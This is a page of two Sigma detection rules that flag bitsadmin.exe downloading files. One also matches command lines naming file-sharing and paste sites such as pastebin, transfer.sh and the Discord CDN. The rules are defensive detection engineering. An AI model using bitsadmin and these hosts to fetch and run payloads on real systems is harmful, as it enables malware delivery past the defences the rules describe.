Techniques
Sample rules
Suspicious Download From File-Sharing Website Via Bitsadmin
- source: sigma
- technicques:
- t1036
- t1036.003
- t1197
Description
Detects usage of bitsadmin downloading a file from a suspicious domain
Detection logic
condition: all of selection_*
selection_domain:
CommandLine|contains:
- .githubusercontent.com
- anonfiles.com
- cdn.discordapp.com
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- pages.dev
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- trycloudflare.com
- ufile.io
- w3spaces.com
- workers.dev
selection_flags:
CommandLine|contains:
- ' /transfer '
- ' /create '
- ' /addfile '
selection_img:
- Image|endswith: \bitsadmin.exe
- OriginalFileName: bitsadmin.exe
File Download Via Bitsadmin
- source: sigma
- technicques:
- t1036
- t1036.003
- t1197
Description
Detects usage of bitsadmin downloading a file
Detection logic
condition: selection_img and (selection_cmd or all of selection_cli_*)
selection_cli_1:
CommandLine|contains:
- ' /create '
- ' /addfile '
selection_cli_2:
CommandLine|contains: http
selection_cmd:
CommandLine|contains: ' /transfer '
selection_img:
- Image|endswith: \bitsadmin.exe
- OriginalFileName: bitsadmin.exe